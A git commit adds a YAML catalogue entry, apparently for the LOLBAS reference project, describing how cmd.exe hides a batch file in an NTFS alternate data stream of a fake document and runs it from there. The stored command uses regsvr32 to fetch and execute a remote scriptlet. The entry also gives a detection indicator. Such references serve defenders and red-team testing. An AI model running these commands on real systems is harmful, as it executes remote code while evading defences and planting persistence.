Cmd.exe ADS

2024-10-23 00:58:42 +02:00 · 2019-06-26 18:33:11 +08:00 · 2019-06-26 18:33:11 +08:00 · fb5f164827
commit fb5f164827
parent af19552915
1 changed files with 30 additions and 0 deletions
--- a/yml/OSBinaries/Cmd.exe.yml
+++ b/yml/OSBinaries/Cmd.exe.yml
@ -0,0 +1,30 @@
+Name: Cmd.exe
+Description: The command-line interpreter in Windows
+Author: 'Ye Yint Min Thu Htut'
+Created: '2019-06-26'
+Commands:
+  - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
+    Description: To add content in an Alternate Data Stream (ADS).
+    
+    Command: cmd.exe - < fakefile.doc:payload.bat
+    Description: Execute payload.bat which is stored in an Alternate Data Stream (ADS).
+    
+    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
+    Category: ADS
+    Privileges: User
+    MitreID: T
+    MitreLink: https://attack.mitre.org/wiki/Technique/T
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+Full_Path:
+  - Path: C:\Windows\System32\cmd.exe
+  - Path: C:\Windows\SysWOW64\cmd.exe
+Code_Sample: 
+- Code:
+Detection:
+ - IOC: cmd.exe executing files from alternate data streams.
+Resources:
+  - Link: https://twitter.com/yeyint_mth/status/1143824979139579904
+Acknowledgement:
+  - Person: r0lan
+    Handle: '@yeyint_mth'
+---